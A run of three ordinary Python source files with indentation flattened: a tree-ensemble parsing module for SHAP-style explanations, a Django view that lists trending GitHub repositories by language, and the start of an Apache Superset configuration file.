# ensure that the passed background dataset lands in every leaf
if np.min(self.trees[i].node_sample_weight) <= 0:
self.fully_defined_weighting = False
# If we should do <= then we nudge the thresholds to make our <= work like <
if not less_than_or_equal:
self.thresholds = np.nextafter(self.thresholds, -np.inf)
self.num_nodes = np.array([len(t.values) for t in self.trees], dtype=np.int32)
self.max_depth = np.max([t.max_depth for t in self.trees])
def get_transform(self, model_output):
""" A consistent interface to make predictions from this model.
"""
if model_output == "margin":
transform = "identity"
elif model_output == "probability":
if self.tree_output == "log_odds":
transform = "logistic"
elif self.tree_output == "probability":
transform = "identity"
else:
raise Exception("model_output = \"probability\" is not yet supported when model.tree_output = \"" + self.tree_output + "\"!")
elif model_output == "logloss":
if self.objective == "squared_error":
transform = "squared_loss"
elif self.objective == "binary_crossentropy":
transform = "logistic_nlogloss"
else:
raise Exception("model_output = \"logloss\" is not yet supported when model.objective = \"" + self.objective + "\"!")
return transform
def predict(self, X, y=None, output="margin", tree_limit=None):
""" A consistent interface to make predictions from this model.
Parameters
----------
tree_limit : None (default) or int
Limit the number of trees used by the model. None (the default) means use the limit stored in the
original model, and -1 means no limit. (See the commented usage sketch after this method.)
"""
if self.model_type == "pyspark":
assert_import("pyspark")
#TODO support predict for pyspark
raise NotImplementedError("Predict with pyspark isn't implemented")
# see if we have a default tree_limit in place.
if tree_limit is None:
tree_limit = -1 if self.tree_limit is None else self.tree_limit
# convert dataframes
if str(type(X)).endswith("pandas.core.series.Series'>"):
X = X.values
elif str(type(X)).endswith("pandas.core.frame.DataFrame'>"):
X = X.values
flat_output = False
if len(X.shape) == 1:
flat_output = True
X = X.reshape(1, X.shape[0])
if X.dtype != self.dtype:
X = X.astype(self.dtype)
X_missing = np.isnan(X, dtype=bool)
assert str(type(X)).endswith("'numpy.ndarray'>"), "Unknown instance type: " + str(type(X))
assert len(X.shape) == 2, "Passed input data matrix X must have 1 or 2 dimensions!"
if tree_limit < 0 or tree_limit > self.values.shape[0]:
tree_limit = self.values.shape[0]
if output == "logloss":
assert y is not None, "Both samples and labels must be provided when explaining the loss (i.e. `explainer.shap_values(X, y)`)!"
assert X.shape[0] == len(y), "The number of labels (%d) does not match the number of samples to explain (%d)!" % (len(y), X.shape[0])
transform = self.get_transform(output)
if True or self.model_type == "internal": # NOTE: the "True or" short-circuit always takes the internal C extension path, so the xgboost branch below is currently unreachable
output = np.zeros((X.shape[0], self.n_outputs))
assert_import("cext")
_cext.dense_tree_predict(
self.children_left, self.children_right, self.children_default,
self.features, self.thresholds, self.values,
self.max_depth, tree_limit, self.base_offset, output_transform_codes[transform],
X, X_missing, y, output
)
elif self.model_type == "xgboost":
assert_import("xgboost")
output = self.original_model.predict(X, output_margin=True, tree_limit=tree_limit)
# drop dimensions we don't need
if flat_output:
if self.n_outputs == 1:
return output.flatten()[0]
else:
return output.reshape(-1, self.n_outputs)
else:
if self.n_outputs == 1:
return output.flatten()
else:
return output
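# Illustrative only -- a rough sketch of how this wrapper is exercised internally
# (names are placeholders):
#
#   ensemble = TreeEnsemble(fitted_model)
#   margin = ensemble.predict(X)                        # raw margin output
#   loss = ensemble.predict(X, y, output="logloss")     # per-sample loss, where supported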
class Tree:
""" A single decision tree.
The primary point of this object is to parse many different tree types into a common format.
(A commented example of the common dict format follows this class.)
"""
def __init__(self, tree, normalize=False, scaling=1.0, data=None, data_missing=None):
assert_import("cext")
if str(type(tree)).endswith("'sklearn.tree._tree.Tree'>"):
self.children_left = tree.children_left.astype(np.int32)
self.children_right = tree.children_right.astype(np.int32)
self.children_default = self.children_left # missing values not supported in sklearn
self.features = tree.feature.astype(np.int32)
self.thresholds = tree.threshold.astype(np.float64)
self.values = tree.value.reshape(tree.value.shape[0], tree.value.shape[1] * tree.value.shape[2])
if normalize:
self.values = (self.values.T / self.values.sum(1)).T
self.values = self.values * scaling
self.node_sample_weight = tree.weighted_n_node_samples.astype(np.float64)
elif type(tree) == dict and 'children_left' in tree:
self.children_left = tree["children_left"].astype(np.int32)
self.children_right = tree["children_right"].astype(np.int32)
self.children_default = tree["children_default"].astype(np.int32)
self.features = tree["feature"].astype(np.int32)
self.thresholds = tree["threshold"]
self.values = tree["value"] * scaling
self.node_sample_weight = tree["node_sample_weight"]
elif str(type(tree)).endswith("pyspark.ml.classification.DecisionTreeClassificationModel'>"):
#model._java_obj.numNodes() doesn't give leaves, need to recompute the size
def getNumNodes(node, size):
size = size + 1
if node.subtreeDepth() == 0:
return size
else:
size = getNumNodes(node.leftChild(), size)
return getNumNodes(node.rightChild(), size)
num_nodes = getNumNodes(tree._java_obj.rootNode(), 0)
self.children_left = np.full(num_nodes, -2, dtype=np.int32)
self.children_right = np.full(num_nodes, -2, dtype=np.int32)
self.children_default = np.full(num_nodes, -2, dtype=np.int32)
self.features = np.full(num_nodes, -2, dtype=np.int32)
self.thresholds = np.full(num_nodes, -2, dtype=np.float64)
self.values = [-2]*num_nodes
self.node_sample_weight = np.full(num_nodes, -2, dtype=np.float64)
def buildTree(index, node):
index = index + 1
self.values[index] = [e for e in node.impurityStats().stats()] # ndarray(numLabel): number of items for each label that went through this node
self.node_sample_weight[index] = node.impurityStats().count() # weighted count of elements through this node
if node.subtreeDepth() == 0:
return index
else:
self.features[index] = node.split().featureIndex() #index of the feature we split on, not available for leaf, int
if str(node.split().getClass()).endswith('tree.CategoricalSplit'):
#Categorical split isn't implemented, TODO: could fake it by creating a fake node to split on the exact value?
raise NotImplementedError('CategoricalSplit are not yet implemented')
self.thresholds[index] = node.split().threshold() #threshold for the feature, not available for leaf, float
self.children_left[index] = index + 1
idx = buildTree(index, node.leftChild())
self.children_right[index] = idx + 1
idx = buildTree(idx, node.rightChild())
return idx
buildTree(-1, tree._java_obj.rootNode())
#default not supported with MLlib? (TODO)
self.children_default = self.children_left
self.values = np.asarray(self.values)
self.values = self.values * scaling
elif type(tree) == dict and 'tree_structure' in tree:
start = tree['tree_structure']
num_parents = tree['num_leaves']-1
self.children_left = np.empty((2*num_parents+1), dtype=np.int32)
self.children_right = np.empty((2*num_parents+1), dtype=np.int32)
self.children_default = np.empty((2*num_parents+1), dtype=np.int32)
self.features = np.empty((2*num_parents+1), dtype=np.int32)
self.thresholds = np.empty((2*num_parents+1), dtype=np.float64)
self.values = [-2]*(2*num_parents+1)
self.node_sample_weight = np.empty((2*num_parents+1), dtype=np.float64)
visited, queue = [], [start]
while queue:
vertex = queue.pop(0)
if 'split_index' in vertex.keys():
if vertex['split_index'] not in visited:
if 'split_index' in vertex['left_child'].keys():
self.children_left[vertex['split_index']] = vertex['left_child']['split_index']
else:
self.children_left[vertex['split_index']] = vertex['left_child']['leaf_index']+num_parents
if 'split_index' in vertex['right_child'].keys():
self.children_right[vertex['split_index']] = vertex['right_child']['split_index']
else:
self.children_right[vertex['split_index']] = vertex['right_child']['leaf_index']+num_parents
if vertex['default_left']:
self.children_default[vertex['split_index']] = self.children_left[vertex['split_index']]
else:
self.children_default[vertex['split_index']] = self.children_right[vertex['split_index']]
self.features[vertex['split_index']] = vertex['split_feature']
self.thresholds[vertex['split_index']] = vertex['threshold']
self.values[vertex['split_index']] = [vertex['internal_value']]
self.node_sample_weight[vertex['split_index']] = vertex['internal_count']
visited.append(vertex['split_index'])
queue.append(vertex['left_child'])
queue.append(vertex['right_child'])
else:
self.children_left[vertex['leaf_index']+num_parents] = -1
self.children_right[vertex['leaf_index']+num_parents] = -1
self.children_default[vertex['leaf_index']+num_parents] = -1
self.features[vertex['leaf_index']+num_parents] = -1
self.thresholds[vertex['leaf_index']+num_parents] = -1
self.values[vertex['leaf_index']+num_parents] = [vertex['leaf_value']]
self.node_sample_weight[vertex['leaf_index']+num_parents] = vertex['leaf_count']
self.values = np.asarray(self.values)
self.values = np.multiply(self.values, scaling)
elif type(tree) == dict and 'nodeid' in tree:
""" Directly create tree given the JSON dump (with stats) of a XGBoost model.
"""
def max_id(node):
if "children" in node:
return max(node["nodeid"], *[max_id(n) for n in node["children"]])
else:
return node["nodeid"]
m = max_id(tree) + 1
self.children_left = -np.ones(m, dtype=np.int32)
self.children_right = -np.ones(m, dtype=np.int32)
self.children_default = -np.ones(m, dtype=np.int32)
self.features = -np.ones(m, dtype=np.int32)
self.thresholds = np.zeros(m, dtype=np.float64)
self.values = np.zeros((m, 1), dtype=np.float64)
self.node_sample_weight = np.empty(m, dtype=np.float64)
def extract_data(node, tree):
i = node["nodeid"]
tree.node_sample_weight[i] = node["cover"]
if "children" in node:
tree.children_left[i] = node["yes"]
tree.children_right[i] = node["no"]
tree.children_default[i] = node["missing"]
tree.features[i] = node["split"]
tree.thresholds[i] = node["split_condition"]
for n in node["children"]:
extract_data(n, tree)
elif "leaf" in node:
tree.values[i] = node["leaf"] * scaling
extract_data(tree, self)
elif type(tree) == str:
""" Build a tree from a text dump (with stats) of xgboost.
"""
nodes = [t.lstrip() for t in tree[:-1].split("\n")]
nodes_dict = {}
for n in nodes: nodes_dict[int(n.split(":")[0])] = n.split(":")[1]
m = max(nodes_dict.keys())+1
children_left = -1*np.ones(m,dtype="int32")
children_right = -1*np.ones(m,dtype="int32")
children_default = -1*np.ones(m,dtype="int32")
features = -2*np.ones(m,dtype="int32")
thresholds = -1*np.ones(m,dtype="float64")
values = 1*np.ones(m,dtype="float64")
node_sample_weight = np.zeros(m,dtype="float64")
values_lst = list(nodes_dict.values())
keys_lst = list(nodes_dict.keys())
for i in range(0,len(keys_lst)):
value = values_lst[i]
key = keys_lst[i]
if ("leaf" in value):
# Extract values
val = float(value.split("leaf=")[1].split(",")[0])
node_sample_weight_val = float(value.split("cover=")[1])
# Append to lists
values[key] = val
node_sample_weight[key] = node_sample_weight_val
else:
c_left = int(value.split("yes=")[1].split(",")[0])
c_right = int(value.split("no=")[1].split(",")[0])
c_default = int(value.split("missing=")[1].split(",")[0])
feat_thres = value.split(" ")[0]
if ("<" in feat_thres):
feature = int(feat_thres.split("<")[0][2:])
threshold = float(feat_thres.split("<")[1][:-1])
if ("=" in feat_thres):
feature = int(feat_thres.split("=")[0][2:])
threshold = float(feat_thres.split("=")[1][:-1])
node_sample_weight_val = float(value.split("cover=")[1].split(",")[0])
children_left[key] = c_left
children_right[key] = c_right
children_default[key] = c_default
features[key] = feature
thresholds[key] = threshold
node_sample_weight[key] = node_sample_weight_val
self.children_left = children_left
self.children_right = children_right
self.children_default = children_default
self.features = features
self.thresholds = thresholds
self.values = values[:,np.newaxis] * scaling
self.node_sample_weight = node_sample_weight
else:
raise Exception("Unknown input to Tree constructor!")
# Re-compute the number of samples that pass through each node if we are given data
if data is not None and data_missing is not None:
self.node_sample_weight[:] = 0.0
_cext.dense_tree_update_weights(
self.children_left, self.children_right, self.children_default, self.features,
self.thresholds, self.values, 1, self.node_sample_weight, data, data_missing
)
# we compute the expectations to make sure they follow the SHAP logic
self.max_depth = _cext.compute_expectations(
self.children_left, self.children_right, self.node_sample_weight,
self.values
)
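# Illustrative only -- a Tree can also be built from a dict in the common format
# parsed above (a hypothetical 3-node stump; the array values are made up):
#
#   stump = Tree({
#       "children_left":      np.array([1, -1, -1]),
#       "children_right":     np.array([2, -1, -1]),
#       "children_default":   np.array([1, -1, -1]),
#       "feature":            np.array([0, -2, -2]),
#       "threshold":          np.array([0.5, 0.0, 0.0]),
#       "value":              np.array([[1.5], [1.0], [2.0]]),
#       "node_sample_weight": np.array([10.0, 6.0, 4.0]),
#   })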
def get_xgboost_json(model):
""" This gets a JSON dump of an XGBoost model while ensuring the features names are their indexes.
"""
fnames = model.feature_names
model.feature_names = None
json_trees = model.get_dump(with_stats=True, dump_format="json")
model.feature_names = fnames
# this fixes a bug where XGBoost can return invalid JSON
json_trees = [t.replace(": inf,", ": 1000000000000.0,") for t in json_trees]
json_trees = [t.replace(": -inf,", ": -1000000000000.0,") for t in json_trees]
return json_trees
class XGBTreeModelLoader(object):
""" This loads an XGBoost model directly from a raw memory dump.
We can't use the JSON dump because, due to numerical precision issues, those
trees can actually be wrong when feature values land almost on a threshold.
(A brief commented usage sketch follows this class.)
"""
def __init__(self, xgb_model):
self.buf = xgb_model.save_raw()
self.pos = 0
# load the model parameters
self.base_score = self.read('f')
self.num_feature = self.read('I')
self.num_class = self.read('i')
self.contain_extra_attrs = self.read('i')
self.contain_eval_metrics = self.read('i')
self.read_arr('i', 29) # reserved
self.name_obj_len = self.read('Q')
self.name_obj = self.read_str(self.name_obj_len)
self.name_gbm_len = self.read('Q')
self.name_gbm = self.read_str(self.name_gbm_len)
assert self.name_gbm == "gbtree", "Only the 'gbtree' model type is supported, not '%s'!" % self.name_gbm
# load the gbtree specific parameters
self.num_trees = self.read('i')
self.num_roots = self.read('i')
self.num_feature = self.read('i')
self.pad_32bit = self.read('i')
self.num_pbuffer_deprecated = self.read('Q')
self.num_output_group = self.read('i')
self.size_leaf_vector = self.read('i')
self.read_arr('i', 32) # reserved
# load each tree
self.num_roots = np.zeros(self.num_trees, dtype=np.int32)
self.num_nodes = np.zeros(self.num_trees, dtype=np.int32)
self.num_deleted = np.zeros(self.num_trees, dtype=np.int32)
self.max_depth = np.zeros(self.num_trees, dtype=np.int32)
self.num_feature = np.zeros(self.num_trees, dtype=np.int32)
self.size_leaf_vector = np.zeros(self.num_trees, dtype=np.int32)
self.node_parents = []
self.node_cleft = []
self.node_cright = []
self.node_sindex = []
self.node_info = []
self.loss_chg = []
self.sum_hess = []
self.base_weight = []
self.leaf_child_cnt = []
for i in range(self.num_trees):
# load the per-tree params
self.num_roots[i] = self.read('i')
self.num_nodes[i] = self.read('i')
self.num_deleted[i] = self.read('i')
self.max_depth[i] = self.read('i')
self.num_feature[i] = self.read('i')
self.size_leaf_vector[i] = self.read('i')
# load the nodes
self.read_arr('i', 31) # reserved
self.node_parents.append(np.zeros(self.num_nodes[i], dtype=np.int32))
self.node_cleft.append(np.zeros(self.num_nodes[i], dtype=np.int32))
self.node_cright.append(np.zeros(self.num_nodes[i], dtype=np.int32))
self.node_sindex.append(np.zeros(self.num_nodes[i], dtype=np.uint32))
self.node_info.append(np.zeros(self.num_nodes[i], dtype=np.float32))
for j in range(self.num_nodes[i]):
self.node_parents[-1][j] = self.read('i')
self.node_cleft[-1][j] = self.read('i')
self.node_cright[-1][j] = self.read('i')
self.node_sindex[-1][j] = self.read('I')
self.node_info[-1][j] = self.read('f')
# print("self.node_cleft[-1][%d]" % j, self.node_cleft[-1][j])
# print("self.node_cright[-1][%d]" % j, self.node_cright[-1][j])
# print("self.node_sindex[-1][%d]" % j, self.node_sindex[-1][j])
# print("self.node_info[-1][%d]" % j, self.node_info[-1][j])
# print()
# load the stat nodes
self.loss_chg.append(np.zeros(self.num_nodes[i], dtype=np.float32))
self.sum_hess.append(np.zeros(self.num_nodes[i], dtype=np.float32))
self.base_weight.append(np.zeros(self.num_nodes[i], dtype=np.float32))
self.leaf_child_cnt.append(np.zeros(self.num_nodes[i], dtype=np.int64))
for j in range(self.num_nodes[i]):
self.loss_chg[-1][j] = self.read('f')
self.sum_hess[-1][j] = self.read('f')
self.base_weight[-1][j] = self.read('f')
self.leaf_child_cnt[-1][j] = self.read('i')
# print("self.loss_chg[-1][%d]" % j, self.loss_chg[-1][j])
# print("self.sum_hess[-1][%d]" % j, self.sum_hess[-1][j])
# print("self.base_weight[-1][%d]" % j, self.base_weight[-1][j])
# print("self.leaf_child_cnt[-1][%d]" % j, self.leaf_child_cnt[-1][j])
# print()
def get_trees(self, data=None, data_missing=None):
shape = (self.num_trees, self.num_nodes.max())
self.children_default = np.zeros(shape, dtype=np.int64)
self.features = np.zeros(shape, dtype=np.int64)
self.thresholds = np.zeros(shape, dtype=np.float32)
self.values = np.zeros((shape[0], shape[1], 1), dtype=np.float32)
trees = []
for i in range(self.num_trees):
for j in range(self.num_nodes[i]):
if np.right_shift(self.node_sindex[i][j], np.uint32(31)) != 0:
self.children_default[i,j] = self.node_cleft[i][j]
else:
self.children_default[i,j] = self.node_cright[i][j]
self.features[i,j] = self.node_sindex[i][j] & ((np.uint32(1) << np.uint32(31)) - np.uint32(1))
if self.node_cleft[i][j] >= 0:
self.thresholds[i,j] = self.node_info[i][j]
else:
self.values[i,j] = self.node_info[i][j]
l = len(self.node_cleft[i])
trees.append(Tree({
"children_left": self.node_cleft[i],
"children_right": self.node_cright[i],
"children_default": self.children_default[i,:l],
"feature": self.features[i,:l],
"threshold": self.thresholds[i,:l],
"value": self.values[i,:l],
"node_sample_weight": self.sum_hess[i]
}, data=data, data_missing=data_missing))
return trees
def read(self, dtype):
size = struct.calcsize(dtype)
val = struct.unpack(dtype, self.buf[self.pos:self.pos+size])[0]
self.pos += size
return val
def read_arr(self, dtype, n_items):
format = "%d%s" % (n_items, dtype)
size = struct.calcsize(format)
val = struct.unpack(format, self.buf[self.pos:self.pos+size])[0]
self.pos += size
return val
def read_str(self, size):
val = self.buf[self.pos:self.pos+size].decode('utf-8')
self.pos += size
return val
def print_info(self):
print("--- global parmeters ---")
print("base_score =", self.base_score)
print("num_feature =", self.num_feature)
print("num_class =", self.num_class)
print("contain_extra_attrs =", self.contain_extra_attrs)
print("contain_eval_metrics =", self.contain_eval_metrics)
print("name_obj_len =", self.name_obj_len)
print("name_obj =", self.name_obj)
print("name_gbm_len =", self.name_gbm_len)
print("name_gbm =", self.name_gbm)
print()
print("--- gbtree specific parameters ---")
print("num_trees =", self.num_trees)
print("num_roots =", self.num_roots)
print("num_feature =", self.num_feature)
print("pad_32bit =", self.pad_32bit)
print("num_pbuffer_deprecated =", self.num_pbuffer_deprecated)
print("num_output_group =", self.num_output_group)
print("size_leaf_vector =", self.size_leaf_vector)
class CatBoostTreeModelLoader:
def __init__(self, cb_model):
cb_model.save_model("cb_model.json", format="json")
with open("cb_model.json", "r") as f:
    self.loaded_cb_model = json.load(f)
# load the CatBoost oblivious trees specific parameters
self.num_trees = self.loaded_cb_model['model_info']['params']['boosting_options']['iterations']
self.max_depth = self.loaded_cb_model['model_info']['params']['tree_learner_options']['depth']
def get_trees(self, data=None, data_missing=None):
# load each tree
trees = []
for tree_index in range(self.num_trees):
# load the per-tree params
depth = len(self.loaded_cb_model['oblivious_trees'][tree_index]['splits'])
# load the nodes
# Re-compute the number of samples that pass through each node if we are given data
leaf_weights = self.loaded_cb_model['oblivious_trees'][tree_index]['leaf_weights']
leaf_weights_unraveled = [0] * (len(leaf_weights) - 1) + leaf_weights
leaf_weights_unraveled[0] = sum(leaf_weights)
for index in range(len(leaf_weights) - 2, 0, -1):
leaf_weights_unraveled[index] = leaf_weights_unraveled[2 * index + 1] + leaf_weights_unraveled[2 * index + 2]
leaf_values = self.loaded_cb_model['oblivious_trees'][tree_index]['leaf_values']
leaf_values_unraveled = [0] * (len(leaf_values) - 1) + leaf_values
children_left = [i * 2 + 1 for i in range(len(leaf_values) - 1)]
children_left += [-1] * len(leaf_values)
children_right = [i * 2 for i in range(1, len(leaf_values))]
children_right += [-1] * len(leaf_values)
children_default = [i * 2 + 1 for i in range(len(leaf_values) - 1)]
children_default += [-1] * len(leaf_values)
# load the split features and borders
# split features and borders go from the leaves to the root
split_features_index = []
borders = []
for elem in self.loaded_cb_model['oblivious_trees'][tree_index]['splits']:
split_features_index.append(elem['float_feature_index'])
borders.append(elem['border'])
split_features_index_unraveled = []
for counter, feature_index in enumerate(split_features_index[::-1]):
split_features_index_unraveled += [feature_index] * (2 ** counter)
split_features_index_unraveled += [0] * len(leaf_values)
borders_unraveled = []
for counter, border in enumerate(borders[::-1]):
borders_unraveled += [border] * (2 ** counter)
borders_unraveled += [0] * len(leaf_values)
trees.append(Tree({"children_left": np.array(children_left),
"children_right": np.array(children_right),
"children_default": np.array(children_default),
"feature": np.array(split_features_index_unraveled),
"threshold": np.array(borders_unraveled),
"value": np.array(leaf_values_unraveled).reshape((-1,1)),
"node_sample_weight": np.array(leaf_weights_unraveled),
}, data=data, data_missing=data_missing))
return trees
|
the-stack_106_19040
|
import requests
from django.shortcuts import render, redirect
from django.http import HttpResponse
from datetime import datetime, timedelta
#from django.http import JsonResponse
import json
# Create your views here.
def trending_lang(request):
time_now = datetime.now()
last_month = (time_now - timedelta(days=30)).strftime("%Y-%m-%d")
url = "https://api.github.com/search/repositories?q=created:>{0}&sort=stars&order=desc&page=1&per_page=100".format(last_month)
data = requests.get(url).json()
languages = {element['language'] for element in data['items'] if element['language'] is not None}
response_object = {
"languages_num" : len(languages),
"incomplete_results": data['incomplete_results'],
"languages" : []
}
for language in languages:
language_repos = get_language_repos(language, data['items'])
response_object['languages'].append({
"name" : language,
"repositories_count" : len(language_repos),
"repositories" : language_repos
})
return HttpResponse(json.dumps(response_object), content_type="application/json")
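# Illustrative only -- a rough sketch of the JSON shape returned by trending_lang
# (field values are made up):
# {
#   "languages_num": 2,
#   "incomplete_results": false,
#   "languages": [
#     {"name": "Python", "repositories_count": 1,
#      "repositories": [{"repo_name": "example", "repo_url": "https://github.com/user/example", "stars_count": 1234}]}
#   ]
# }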
def get_language_repos(language, repositories):
'''
Parameters:
language (str): language name
repositories (list): list of repository dicts from the GitHub search API
Return:
list of repos for the given language
'''
repos = []
for repo in repositories:
if repo['language'] == language:
# construct repo with information we need
repo_info = {
"repo_name" : repo['name'],
"repo_url" : repo['html_url'],
"stars_count" : repo['stargazers_count']
}
repos.append(repo_info)
return repos
|
the-stack_106_19041
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""The main config file for Superset
All configuration in this file can be overridden by providing a superset_config
in your PYTHONPATH as there is a ``from superset_config import *``
at the end of this file.
"""
import imp
import importlib.util
import json
import logging
import os
import sys
from collections import OrderedDict
from datetime import date
from typing import Any, Callable, Dict, List, Optional, Type, TYPE_CHECKING
from cachelib.base import BaseCache
from celery.schedules import crontab
from dateutil import tz
from flask import Blueprint
from flask_appbuilder.security.manager import AUTH_DB
from pandas.io.parsers import STR_NA_VALUES
from superset.jinja_context import ( # pylint: disable=unused-import
BaseTemplateProcessor,
)
from superset.stats_logger import DummyStatsLogger
from superset.typing import CacheConfig
from superset.utils.core import is_test
from superset.utils.log import DBEventLogger
from superset.utils.logging_configurator import DefaultLoggingConfigurator
logger = logging.getLogger(__name__)
if TYPE_CHECKING:
from flask_appbuilder.security.sqla import models # pylint: disable=unused-import
from superset.models.core import Database # pylint: disable=unused-import
# Realtime stats logger, a StatsD implementation exists
STATS_LOGGER = DummyStatsLogger()
EVENT_LOGGER = DBEventLogger()
SUPERSET_LOG_VIEW = True
BASE_DIR = os.path.abspath(os.path.dirname(__file__))
if "SUPERSET_HOME" in os.environ:
DATA_DIR = os.environ["SUPERSET_HOME"]
else:
DATA_DIR = os.path.join(os.path.expanduser("~"), ".superset")
# ---------------------------------------------------------
# Superset specific config
# ---------------------------------------------------------
VERSION_INFO_FILE = os.path.join(BASE_DIR, "static", "version_info.json")
PACKAGE_JSON_FILE = os.path.join(BASE_DIR, "static", "assets", "package.json")
# Multiple favicons can be specified here. The "href" property
# is mandatory, but "sizes," "type," and "rel" are optional.
# For example:
# {
# "href":path/to/image.png",
# "sizes": "16x16",
# "type": "image/png"
# "rel": "icon"
# },
FAVICONS = [{"href": "/static/assets/images/favicon.png"}]
def _try_json_readversion(filepath: str) -> Optional[str]:
try:
with open(filepath, "r") as f:
return json.load(f).get("version")
except Exception: # pylint: disable=broad-except
return None
def _try_json_readsha( # pylint: disable=unused-argument
filepath: str, length: int
) -> Optional[str]:
try:
with open(filepath, "r") as f:
return json.load(f).get("GIT_SHA")[:length]
except Exception: # pylint: disable=broad-except
return None
# Depending on the context in which this config is loaded, the
# version_info.json file may or may not be available, as it is
# generated on install via setup.py. In the event that we're
# actually running Superset, we will have already installed,
# therefore it WILL exist. When unit tests are running, however,
# it WILL NOT exist, so we fall back to reading package.json
VERSION_STRING = _try_json_readversion(VERSION_INFO_FILE) or _try_json_readversion(
PACKAGE_JSON_FILE
)
VERSION_SHA_LENGTH = 8
VERSION_SHA = _try_json_readsha(VERSION_INFO_FILE, VERSION_SHA_LENGTH)
ROW_LIMIT = 50000
VIZ_ROW_LIMIT = 10000
# max rows retrieved when requesting samples from datasource in explore view
SAMPLES_ROW_LIMIT = 1000
# max rows retrieved by filter select auto complete
FILTER_SELECT_ROW_LIMIT = 10000
SUPERSET_WORKERS = 2 # deprecated
SUPERSET_CELERY_WORKERS = 32 # deprecated
SUPERSET_WEBSERVER_PROTOCOL = "http"
SUPERSET_WEBSERVER_ADDRESS = "0.0.0.0"
SUPERSET_WEBSERVER_PORT = 8088
# This is an important setting, and should be lower than your
# [load balancer / proxy / envoy / kong / ...] timeout settings.
# You should also make sure to configure your WSGI server
# (gunicorn, nginx, apache, ...) timeout setting to be <= this setting
SUPERSET_WEBSERVER_TIMEOUT = 60
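# For example, assuming gunicorn is the WSGI server, a matching timeout could be
# set on the command line (the entrypoint below is a placeholder):
# gunicorn --timeout 60 "<your-superset-wsgi-entrypoint>"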
# these two settings are used by the dashboard periodical force refresh feature
# When the user chooses an auto force refresh frequency
# < SUPERSET_DASHBOARD_PERIODICAL_REFRESH_LIMIT
# they will see a warning message in the Refresh Interval Modal.
# please check PR #9886
SUPERSET_DASHBOARD_PERIODICAL_REFRESH_LIMIT = 0
SUPERSET_DASHBOARD_PERIODICAL_REFRESH_WARNING_MESSAGE = None
SUPERSET_DASHBOARD_POSITION_DATA_LIMIT = 65535
CUSTOM_SECURITY_MANAGER = None
SQLALCHEMY_TRACK_MODIFICATIONS = False
# ---------------------------------------------------------
# Your App secret key
SECRET_KEY = "\2\1thisismyscretkey\1\2\\e\\y\\y\\h"
# The SQLAlchemy connection string.
SQLALCHEMY_DATABASE_URI = "sqlite:///" + os.path.join(DATA_DIR, "superset.db")
# SQLALCHEMY_DATABASE_URI = 'mysql://myapp@localhost/myapp'
# SQLALCHEMY_DATABASE_URI = 'postgresql://root:password@localhost/myapp'
# In order to hook up a custom password store for all SQLACHEMY connections
# implement a function that takes a single argument of type 'sqla.engine.url',
# returns a password and set SQLALCHEMY_CUSTOM_PASSWORD_STORE.
#
# e.g.:
# def lookup_password(url):
# return 'secret'
# SQLALCHEMY_CUSTOM_PASSWORD_STORE = lookup_password
SQLALCHEMY_CUSTOM_PASSWORD_STORE = None
# The limit of queries fetched for query search
QUERY_SEARCH_LIMIT = 1000
# Flask-WTF flag for CSRF
WTF_CSRF_ENABLED = True
# Add endpoints that need to be exempt from CSRF protection
WTF_CSRF_EXEMPT_LIST = ["superset.views.core.log", "superset.charts.api.data"]
# Whether to run the web server in debug mode or not
DEBUG = os.environ.get("FLASK_ENV") == "development"
FLASK_USE_RELOAD = True
# Superset allows server-side python stacktraces to be surfaced to the
# user when this feature is on. This may have security implications
# and it's more secure to turn it off in production settings.
SHOW_STACKTRACE = True
# Use all X-Forwarded headers when ENABLE_PROXY_FIX is True.
# When proxying to a different port, set "x_port" to 0 to avoid downstream issues.
ENABLE_PROXY_FIX = False
PROXY_FIX_CONFIG = {"x_for": 1, "x_proto": 1, "x_host": 1, "x_port": 1, "x_prefix": 1}
# ------------------------------
# GLOBALS FOR APP Builder
# ------------------------------
# Uncomment to setup Your App name
APP_NAME = "Superset"
# Uncomment to setup an App icon
APP_ICON = "/static/assets/images/superset-logo-horiz.png"
APP_ICON_WIDTH = 126
# Uncomment to specify where clicking the logo would take the user
# e.g. setting it to '/welcome' would take the user to '/superset/welcome'
LOGO_TARGET_PATH = None
# Enables SWAGGER UI for superset openapi spec
# ex: http://localhost:8080/swagger/v1
FAB_API_SWAGGER_UI = True
# Druid query timezone
# tz.tzutc() : Using utc timezone
# tz.tzlocal() : Using local timezone
# tz.gettz('Asia/Shanghai') : Using the time zone with specific name
# [TimeZone List]
# See: https://en.wikipedia.org/wiki/List_of_tz_database_time_zones
# other tz can be overridden by providing a local_config
DRUID_TZ = tz.tzutc()
DRUID_ANALYSIS_TYPES = ["cardinality"]
# Legacy Druid NoSQL (native) connector
# Druid supports a SQL interface in its newer versions.
# Setting this flag to True enables the deprecated, API-based Druid
# connector. This feature may be removed at a future date.
DRUID_IS_ACTIVE = False
# If Druid is active whether to include the links to scan/refresh Druid datasources.
# This should be disabled if you are trying to wean yourself off of the Druid NoSQL
# connector.
DRUID_METADATA_LINKS_ENABLED = True
# ----------------------------------------------------
# AUTHENTICATION CONFIG
# ----------------------------------------------------
# The authentication type
# AUTH_OID : Is for OpenID
# AUTH_DB : Is for database (username/password)
# AUTH_LDAP : Is for LDAP
# AUTH_REMOTE_USER : Is for using REMOTE_USER from web server
AUTH_TYPE = AUTH_DB
# Uncomment to setup Full admin role name
# AUTH_ROLE_ADMIN = 'Admin'
# Uncomment to setup Public role name, no authentication needed
# AUTH_ROLE_PUBLIC = 'Public'
# Will allow user self registration
# AUTH_USER_REGISTRATION = True
# The default user self registration role
# AUTH_USER_REGISTRATION_ROLE = "Public"
# When using LDAP Auth, setup the LDAP server
# AUTH_LDAP_SERVER = "ldap://ldapserver.new"
# Uncomment to setup OpenID providers example for OpenID authentication
# OPENID_PROVIDERS = [
# { 'name': 'Yahoo', 'url': 'https://open.login.yahoo.com/' },
# { 'name': 'Flickr', 'url': 'https://www.flickr.com/<username>' },
# ]
# ---------------------------------------------------
# Roles config
# ---------------------------------------------------
# Grant public role the same set of permissions as for a selected builtin role.
# This is useful if one wants to enable anonymous users to view
# dashboards. Explicit grant on specific datasets is still required.
